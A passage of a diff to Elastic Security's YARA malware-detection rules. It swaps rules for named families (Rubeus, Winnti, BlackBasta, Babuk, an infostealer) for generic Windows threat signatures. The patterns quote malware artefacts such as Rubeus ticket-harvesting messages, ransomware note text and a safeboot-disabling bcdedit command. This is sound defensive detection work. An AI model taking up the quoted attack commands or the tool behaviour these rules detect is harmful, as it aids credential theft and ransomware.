"fd159cf2f9bd48b0f6f5958eef8af8feede2bcbbea035a7e56ce1ff72d3f47eb" + logic_hash = "8536593696930d03f1e62586886f0df5438d13fb796b4605df7ad67d9633d5f9" score = 75 - quality = 73 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "073d62ce55b1940774ffadeb5b76343aa49bd0a36cf82d50e2bae44f6049a1e8" - severity = 100 + fingerprint = "35ff6c9b338ef95585d8d0059966857f6e5a426fa5f357acb844d264d239c70d" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a1 = { 24 10 89 44 24 68 8B 4C 24 14 8B 54 24 18 85 C9 74 57 74 03 8B } - $a2 = { 6D 61 69 6E 2E 43 68 65 63 6B 49 73 52 75 6E 6E 69 6E 67 } + $a1 = { 55 8B EC 8B 4D 0C 56 8B 75 08 89 0E E8 AB 17 00 00 8B 48 24 89 4E 04 E8 A0 17 00 00 89 70 24 8B C6 5E 5D C3 55 8B EC 56 E8 8F 17 00 00 8B 75 08 3B 70 24 75 0E 8B 76 04 E8 7F 17 00 00 89 70 24 } condition: all of them } -rule ELASTIC_Windows_Hacktool_Rubeus_43F18623 : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_A0C7B402 : FILE MEMORY { meta: - description = "Detects Windows Hacktool Rubeus (Windows.Hacktool.Rubeus)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "43f18623-6024-4608-8019-e3fecd54cf84" - date = "2022-10-20" - modified = "2022-11-24" + id = "a0c7b402-cee5-4da6-9a32-72b1a0ae0f8d" + date = "2024-01-16" + modified = "2024-02-08" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Hacktool_Rubeus.yar#L1-L27" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "b7b4691ad1cdad7663c32d07e911a03d9cc8b104f724c2825fd4957007649235" - logic_hash = "8714f30e12c0dc61c83491a71dbf9f1e9b6bc66663a8f2c069e7a7841d52cf68" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L1220-L1238" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "5814d7712304800d92487b8e1108d20ad7b44f48910b1fb0a99e9b36baa4333a" + logic_hash = "d0aa75debbefb301b9fc46ceca4944ae8c4b009118214a9589440b59089b853e" score = 75 - quality = 73 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "fbc2f67f394a4d21cac532b42c6749002cb7284b4a3912e18672881e6e74765d" - severity = 100 + fingerprint = "0ca7d91a97c12f4640dd367d19d8645dd1da713cfa62289c40f8c34202ddf256" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $guid = "658C8B7F-3664-4A95-9572-A3E5871DFC06" ascii wide nocase - $print_str0 = "[*] Printing argument list for use with Rubeus" ascii wide - $print_str1 = "[+] Ticket successfully imported!" ascii wide - $print_str2 = "[+] Tickets successfully purged!" ascii wide - $print_str3 = "[*] Searching for accounts that support AES128_CTS_HMAC_SHA1_96/AES256_CTS_HMAC_SHA1_96" ascii wide - $print_str4 = "[*] Action: TGT Harvesting (with auto-renewal)" ascii wide - $print_str5 = "[X] Unable to retrieve TGT using tgtdeleg" ascii wide - $print_str6 = "[!] Unhandled Rubeus exception:" ascii wide - $print_str7 = "[*] Using a TGT /ticket to request service tickets" ascii wide + $a1 = { 55 89 E5 57 56 83 E4 F8 83 EC 20 8B 75 10 8B 7D 0C 89 E0 8D 4C 24 18 6A 05 6A 18 50 51 FF 75 08 68 BC 52 4D 90 E8 26 00 00 00 83 C4 18 85 FF 74 06 8B 4C 24 08 89 0F 85 F6 74 08 80 7C 24 15 00 } condition: - $guid or 4 of ($print_str*) + all of them } -rule ELASTIC_Windows_Trojan_Rudebird_3Cbf7Bc6 : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_42B3E0D7 : FILE MEMORY { meta: - description = "Detects Windows Trojan Rudebird (Windows.Trojan.RudeBird)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "3cbf7bc6-71c5-4c7c-a846-7a95c3d28917" - date = "2023-05-09" - modified = "2023-06-13" - reference = "https://www.elastic.co/security-labs/introducing-the-ref5961-intrusion-set" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_RudeBird.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "2095c3b6bde779b5661c7796b5e33bb0c43facf791b272a603b786f889a06a95" + id = "42b3e0d7-ec42-4940-b5f3-e9782997dccf" + date = "2024-01-17" + modified = "2024-02-08" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L1240-L1258" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "99ad416b155970fda383a63fe61de2e4d0254e9c9e09564e17938e8e2b49b5b7" + logic_hash = "58b4c667b6d796f4525afeb706394f593d03393e3a48e2a0b7664f121e6a78fe" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "f70bd86d877d9371601c7f65cf50a5bb9b76ba45acbf591bd8e4c1117a0cac1d" - severity = 100 + fingerprint = "7d3974400d05bc7bbcd63c99e8257d0676b38335de74a4bcfde9e86553f50f08" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $a1 = { 40 53 48 83 EC 20 48 8B D9 B9 D8 00 00 00 E8 FD C1 FF FF 48 8B C8 33 C0 48 85 C9 74 05 E8 3A F2 } + $a1 = { 83 C4 F8 53 33 DB 6A 00 8D 45 F8 50 8B 45 0C 50 8B 45 10 50 6A 00 6A 00 33 C9 33 D2 8B 45 08 E8 B1 F7 FF FF 85 C0 75 05 BB 01 00 00 00 8B C3 5B 59 59 5D C2 0C 00 8D 40 00 53 BB E0 E1 } condition: all of them } -rule ELASTIC_Windows_Trojan_Sythe_02B2811A : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_66142106 : FILE MEMORY { meta: - description = "Detects Windows Trojan Sythe (Windows.Trojan.Sythe)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "02b2811a-2ced-42b6-a9f1-6d983d1dc986" - date = "2023-05-10" - modified = "2023-06-13" + id = "66142106-d602-4b1b-a79b-64d692c613ca" + date = "2024-01-17" + modified = "2024-02-08" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Sythe.yar#L1-L22" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "2d54a8ba40cc9a1c74db7a889bc75a38f16ae2d025268aa07851c1948daa1b4d" - logic_hash = "ba472b35f583dd4cf125df575129d07de289d6d7dc12ecdcc518ce1eb9f18def" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L1260-L1278" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "cd164a65fb2a496ad7b54c782f25fbfca0540d46d2c0d6b098d7be516c4ce021" + logic_hash = "bf5d8db3ed6d2abc3158b04e904351250bf17a6d766e31769b3c5a6e534165b0" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "4dd9764e285985fbea5361e5edfa04e75fb8e3e7945cbbf712ea0183471e67ae" - severity = 100 + fingerprint = "b5816297691fefc46ab11cb175a4e20d40c5095c20417e80590ceb05bd1ec974" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $a1 = "loadmodule" - $a2 = "--privileges" - $a3 = "--shutdown" - $a4 = "SetClientThreadID" + $a1 = { 83 EC 10 6A 00 8D 4D F0 E8 6B FF FF FF 8B 45 F4 BA E9 FD 00 00 39 50 08 74 0C E8 29 48 00 00 33 D2 85 C0 75 01 42 80 7D FC 00 74 0A 8B 4D F0 83 A1 50 03 00 00 FD 8B C2 C9 C3 8B FF 56 } condition: all of them } -rule ELASTIC_Macos_Infostealer_Mdquerytcc_142313Cb : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_51A1D82B : FILE MEMORY { meta: - description = "Detects Macos Infostealer Mdquerytcc (MacOS.Infostealer.MdQueryTCC)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "142313cb-4726-442d-957c-5078440b8940" - date = "2023-04-11" - modified = "2024-08-19" + id = "51a1d82b-2ae0-45c9-b51d-9b54454dfcee" + date = "2024-01-17" + modified = "2024-02-08" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/MacOS_Infostealer_MdQueryTCC.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "d895075057e491b34b0f8c0392b44e43ade425d19eaaacea6ef8c5c9bd3487d8" - logic_hash = "e00015867ad0a0c440a49364945fe828d50675ecfd2039028653d97c77cff323" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L1280-L1298" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "1a7adde856991fa25fac79048461102fba58cda9492d4f5203b817d767a81018" + logic_hash = "2d6b0560e1980deb6aad8e0902d065eeda406506b70bb8bb27c7fa58be9842f8" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "280fa2c49461d0b53425768b9114696104c3ed0241ed157c22e36cdbaa334ac9" - severity = 100 - arch_context = "x86, arm64" + fingerprint = "fddf98cdb00734e50908161d6715e807b1c4437789af524d6f0a17df55572261" + severity = 50 + arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "macos" + os = "windows" strings: - $string1 = { 6B 4D 44 49 74 65 6D 44 69 73 70 6C 61 79 4E 61 6D 65 20 ( 3D | 3D ) 20 2A 54 43 43 2E 64 62 } + $a1 = { 83 EC 04 53 56 57 89 4D FC 8B 45 FC 50 FF 15 D0 63 41 00 5F 5E 5B C9 C3 CC CC CC CC CC 66 8B 01 56 66 8B 32 57 66 3B F0 72 44 75 0A 66 8B 79 02 66 39 7A 02 72 38 66 3B F0 75 14 66 8B } condition: - any of them + all of them } -rule ELASTIC_Linux_Trojan_Winnti_61215D98 : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_Dee3B4Bf : FILE MEMORY { meta: - description = "Detects Linux Trojan Winnti (Linux.Trojan.Winnti)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "61215d98-f52d-45d3-afa2-4bd25270aa99" - date = "2021-01-12" - modified = "2021-09-16" + id = "dee3b4bf-f09e-46a7-b177-6b1445db88ad" + date = "2024-01-17" + modified = "2024-02-08" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Winnti.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "cc1455e3a479602581c1c7dc86a0e02605a3c14916b86817960397d5a2f41c31" - logic_hash = "051cc157f189094d25d45e66e410bdfd61ed7649a4c935d076cec1597c5debf5" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L1300-L1318" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "c7f4b63fa5c7386d6444c0d0428a8fe328446efcef5fda93821f05e86efd2fba" + logic_hash = "cfd7f9250ab44ffe12b62f84ae753032642d9aa2524d88a6d4d989a2afa043a3" score = 75 - quality = 75 + quality = 73 tags = "FILE, MEMORY" - fingerprint = "20ee92147edbf91447cca2ee0c47768a50ec9c7aa7d081698953d3bdc2a25320" - severity = 100 + fingerprint = "6f6cf93e5ac640d1e71f9554752a846c3cc051d95c232e2f4d8fa383d5a3b5af" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { FF FF FF C9 C3 55 48 89 E5 48 83 EC 30 89 F8 66 89 45 DC C7 45 FC FF FF } + $a1 = { 4A 75 73 74 20 63 6F 70 79 20 74 68 65 20 70 61 74 63 68 20 74 6F 20 74 68 65 20 70 72 6F 67 72 61 6D 20 64 69 72 65 63 74 6F 72 79 20 61 6E 64 20 61 70 70 6C 79 2E } condition: all of them } -rule ELASTIC_Linux_Trojan_Winnti_4C5A1865 : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_Fdbcd3F2 : FILE MEMORY { meta: - description = "Detects Linux Trojan Winnti (Linux.Trojan.Winnti)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "4c5a1865-ff41-445b-8616-c83b87498c2b" - date = "2021-06-28" - modified = "2021-09-16" - reference = "0d963a713093fc8e5928141f5747640c9b43f3aadc8a5478c949f7ec364b28ad" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Winnti.yar#L21-L39" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "69f6dcba59ec8cd7f4dfe853495a35601e35d74476fad9e18bef7685a68ece51" + id = "fdbcd3f2-17e6-49d4-997b-91e6a85e4226" + date = "2024-01-17" + modified = "2024-02-08" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L1320-L1338" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "9258e4fe077be21ad7ae348868f1ac6226f6e9d404c664025006ab4b64222369" + logic_hash = "ca9136ca44a61795cca44ac9bb0494fdc34c08d6578603ba3be3582956f4a98f" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "685fe603e04ff123b3472293d3d83e2dc833effd1a7e6c616ff17ed61df0004c" - severity = "100" + fingerprint = "2a69deed3fe05b64cb37881ce50cae8972e7a610fd32c4b7f9155409bc5b297c" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { C1 E8 1F 84 C0 75 7B 85 D2 89 D5 7E 75 8B 47 0C 39 C6 7D 6E 44 8D } + $a1 = { 83 C4 FC 60 8B 75 0C 8D A4 24 00 00 00 00 8D A4 24 00 00 00 00 90 56 E8 22 00 00 00 0B C0 75 05 89 45 FC EB 11 89 35 84 42 40 00 46 8B 5D 08 38 18 75 E3 89 45 FC 61 8B 45 FC C9 C2 08 } condition: all of them } -rule ELASTIC_Linux_Trojan_Winnti_6F4Ca425 : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_B7852Ccf : FILE MEMORY { meta: - description = "Detects Linux Trojan Winnti (Linux.Trojan.Winnti)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "6f4ca425-5cd2-4c22-b017-b5fc02b3abc2" - date = "2022-01-05" - modified = "2022-01-26" - reference = "161af780209aa24845863f7a8120aa982aa811f16ec04bcd797ed165955a09c1" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Winnti.yar#L41-L59" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "a1ffc0e3d27c4bb9fd10f14d45b649b4f059c654b31449013ac06d0981ed25ed" + id = "b7852ccf-ba11-44e2-95b9-eb92d6976e15" + date = "2024-01-17" + modified = "2024-02-08" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L1340-L1360" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "5ac70fa959be4ee37c0c56f0dd04061a5fed78fcbde21b8449fc93e44a8c133a" + logic_hash = "4d5c29cceaacfda0c41bcd13cf95e90397b1b6c0c6beeb19b9184f435c8669b9" score = 75 - quality = 75 + quality = 69 tags = "FILE, MEMORY" - fingerprint = "dec25af33fc004de3a1f53e0c3006ff052f7c51c95f90be323b281590da7d924" - severity = "100" + fingerprint = "f33ef7996bcb0422227b9481d85b3663fb0f13f1be01837b42ac0c5f0bcff781" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 89 E5 48 89 7D D8 48 8B 45 D8 0F B6 40 27 0F BE C0 89 45 F8 48 8B } + $a1 = { 45 2B 34 2C 3D 43 4A 32 3A 24 40 2F 22 3E 3F 3C 24 44 } + $a2 = { 67 6F 72 67 65 6F 75 73 68 6F 72 6E 79 } + $a3 = { 62 6C 61 63 6B 20 68 61 69 72 75 6E 73 68 61 76 65 64 } condition: all of them } -rule ELASTIC_Linux_Trojan_Winnti_De4B0F6E : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_C3C8F21A : FILE MEMORY { meta: - description = "Detects Linux Trojan Winnti (Linux.Trojan.Winnti)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "de4b0f6e-0183-4ea8-9c03-f716a25f1884" - date = "2022-01-05" - modified = "2022-01-26" - reference = "a6b9b3ea19eaddd4d90e58c372c10bbe37dbfced638d167182be2c940e615710" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Winnti.yar#L61-L79" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "fb7b0ff4757dfc1ba2ca8585d5ddf14aae03063e10bdc2565443362c6ba37c30" + id = "c3c8f21a-4722-4b6f-85e1-023d45487aeb" + date = "2024-01-17" + modified = "2024-02-08" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L1362-L1380" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "9a102873dd37d08f53dcf6b5dad2555598a954d18fb3090bbf842655c5fded35" + logic_hash = "b4d2b28fb2c9d46884b0b34f7821151b88891a8d881885c704e0e192cf7fca70" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "c72eddc2d72ea979ad4f680d060aac129f1cd61dbdf3b0b5a74f5d35a9fe69d7" - severity = "100" + fingerprint = "5bae56d41d4582aed0a6fd54eab53ce6d47f0d70711cc17e77f8e85019d2ac7e" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 85 30 FF FF FF 02 00 48 8D 85 30 FF FF FF 48 8D 50 02 0F B7 85 28 FF } + $a1 = { 55 89 E5 83 EC 14 53 56 57 8D 7D F7 BE 1E CA 40 00 B9 02 00 00 00 F3 A5 A4 68 62 CA 40 00 68 64 CA 40 00 E8 A8 25 00 00 83 C4 08 89 C3 8D 45 EC 50 E8 CA 24 00 00 59 8D 45 EC 50 E8 80 26 00 00 } condition: all of them } -rule ELASTIC_Windows_Ransomware_Blackbasta_494D3C54 : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_A3D51E0C : FILE MEMORY { meta: - description = "Detects Windows Ransomware Blackbasta (Windows.Ransomware.BlackBasta)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "494d3c54-4690-4334-b64d-ebeeb305de0e" - date = "2022-08-06" - modified = "2022-08-16" + id = "a3d51e0c-9d49-48e5-abdb-ceeb10780cfa" + date = "2024-01-17" + modified = "2024-02-08" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Ransomware_BlackBasta.yar#L1-L27" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "357fe8c56e246ffacd54d12f4deb9f1adb25cb772b5cd2436246da3f2d01c222" - logic_hash = "1ecb3c95a2d3f91d267f0b625fffc8477612fde9de3942eff8eb13115c0af6b8" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L1382-L1400" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "18bd25df1025cd04b0642e507b0170bc1a2afba71b2dc4bd5e83cc487860db0d" + logic_hash = "f128f6a037abb4af2c11605b182852146780be6451b3062a2914bedb5c286843" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "27602cb05c054a1aa9e27b91675d57707f4a63fa91badc83ad86229839778f4e" - severity = 100 + fingerprint = "069a218c752b5aac5b26b19b36b641b3dd31f09d7fcaae735efb52082a3495cc" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $a1 = "Done time: %.4f seconds, encrypted: %.4f gb" ascii fullword - $a2 = "Creating readme at %s" wide fullword - $a3 = "All of your files are currently encrypted by no_name_software." ascii fullword - $a4 = "DON'T move or rename your files. These parameters can be used for encryption/decryption process." ascii fullword - $b1 = "Your data are stolen and encrypted" ascii fullword - $b2 = "bcdedit /deletevalue safeboot" ascii fullword - $b3 = "Your company id for log in:" - $byte_seq = { 0F AF 45 DC 8B CB 0F AF 4D DC 0F AF 5D D8 0F AF 55 D8 8B F9 } - $byte_seq2 = { 18 FF 24 1E 18 FF 64 61 5D FF CF CF CF FF D0 D0 D0 FF D0 D0 D0 FF } + $a1 = { 55 8B EC 53 56 8B 75 08 33 DB 39 5D 14 57 75 10 3B F3 75 10 39 5D 0C 75 12 33 C0 5F 5E 5B 5D C3 3B F3 74 07 8B 7D 0C 3B FB 77 1B E8 05 F8 FF FF 6A 16 5E 89 30 53 53 53 53 53 E8 97 F7 FF FF 83 } condition: - 4 of them + all of them } -rule ELASTIC_Linux_Backdoor_Python_00606Bac : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_54Ccad4D : FILE MEMORY { meta: - description = "Detects Linux Backdoor Python (Linux.Backdoor.Python)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "00606bac-83eb-4a58-82d2-e4fd16d30846" - date = "2021-01-12" - modified = "2021-09-16" + id = "54ccad4d-3b8d-4abb-88eb-d428d661169d" + date = "2024-01-17" + modified = "2024-02-08" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Backdoor_Python.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "b3e3728d43535f47a1c15b915c2d29835d9769a9dc69eb1b16e40d5ba1b98460" - logic_hash = "92ad2cf4aa848c8f3bcedd319654bf5ef873cd4daba62572381c7e20f0296b82" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L1402-L1422" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "fe4aad002722d2173dd661b7b34cdb0e3d4d8cd600e4165975c48bf1b135763f" + logic_hash = "b9fb525be22dd2f235c3ac68688ced5298da45194ad032423689f5a085df6e31" score = 75 - quality = 75 + quality = 69 tags = "FILE, MEMORY" - fingerprint = "cce1d0e7395a74c04f15ff95f6de7fd7d5f46ede83322b832df74133912c0b17" - severity = 100 + fingerprint = "4fe13c4ca3569912978a0c2231ec53a715a314e1158e09bc0c61f18151cfffa3" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { F4 01 83 45 F8 01 8B 45 F8 0F B6 00 84 C0 75 F2 83 45 F8 01 8B } + $a1 = { 4D 55 73 65 72 4E 61 74 69 66 65 72 63 } + $a2 = { 4D 79 52 65 67 53 61 76 65 52 65 63 6F 72 64 } + $a3 = { 53 74 65 61 6C 65 72 54 69 6D 65 4F 75 74 } condition: all of them } -rule ELASTIC_Linux_Ransomware_Babuk_Bd216Cab : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_6Ee18020 : FILE MEMORY { meta: - description = "Detects Linux Ransomware Babuk (Linux.Ransomware.Babuk)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "bd216cab-6532-4a71-9353-8ad692550b97" - date = "2024-05-09" - modified = "2024-06-12" + id = "6ee18020-71e2-4003-99ef-963663e94740" + date = "2024-01-17" + modified = "2024-02-08" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Ransomware_Babuk.yar#L1-L20" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "d305a30017baef4f08cee38a851b57869676e45c66e64bb7cc58d40bf0142fe0" - logic_hash = "b0538be9d8deccc3f77640da28e5fd38a07557e9e5e3c09b11349d7eb50a56b5" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L1424-L1442" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "d58d8f5a7efcb02adac92362d8c608e6d056824641283497b2e1c1f0e2d19b0a" + logic_hash = "8a08973ae2ddde275e007686fc6eca831c1fb398b7221d5022da10f90da0e44d" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "c7517a40759de20edf7851d164c0e4ba71de049f8ea964f15ab5db12c35352ad" - severity = 100 + fingerprint = "b8b18dcec6556bc7fb9b9f257a6485bcd6dfde96fc5c7e8145664de55d0c6803" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a1 = "Whole files count: %d" - $a2 = "Doesn't encrypted files: %d" + $a1 = { 55 8B EC 53 8B 5D 0C 8B 45 08 50 E8 9C 19 02 00 59 89 03 89 53 04 83 7B 04 00 75 07 83 3B 00 76 10 EB 02 7E 0C C6 43 28 01 33 C0 5B 5D C3 5B 5D C3 B8 01 00 00 00 5B 5D C3 90 90 90 55 8B EC 53 } condition: all of them } -rule ELASTIC_Windows_Vulndriver_Rtcore_4Eeb2Ce5 : FILE +rule ELASTIC_Windows_Generic_Threat_8Eb547Db : FILE MEMORY { meta: - description = "Detects Windows Vulndriver Rtcore (Windows.VulnDriver.RtCore)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "4eeb2ce5-e481-4e9c-beda-2b01f259ed96" - date = "2022-04-04" - modified = "2022-08-30" + id = "8eb547db-81e4-4c64-9bab-b7944af32345" + date = "2024-01-17" + modified = "2024-02-08" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_VulnDriver_RtCore.yar#L1-L20" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "01aa278b07b58dc46c84bd0b1b5c8e9ee4e62ea0bf7a695862444af32e87f1fd" - logic_hash = "f547bce6554c60e8f3ef8e128c05533cf1f35ce0ee414d5a1c5e9a205b05d8fe" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L1444-L1462" + license_url = 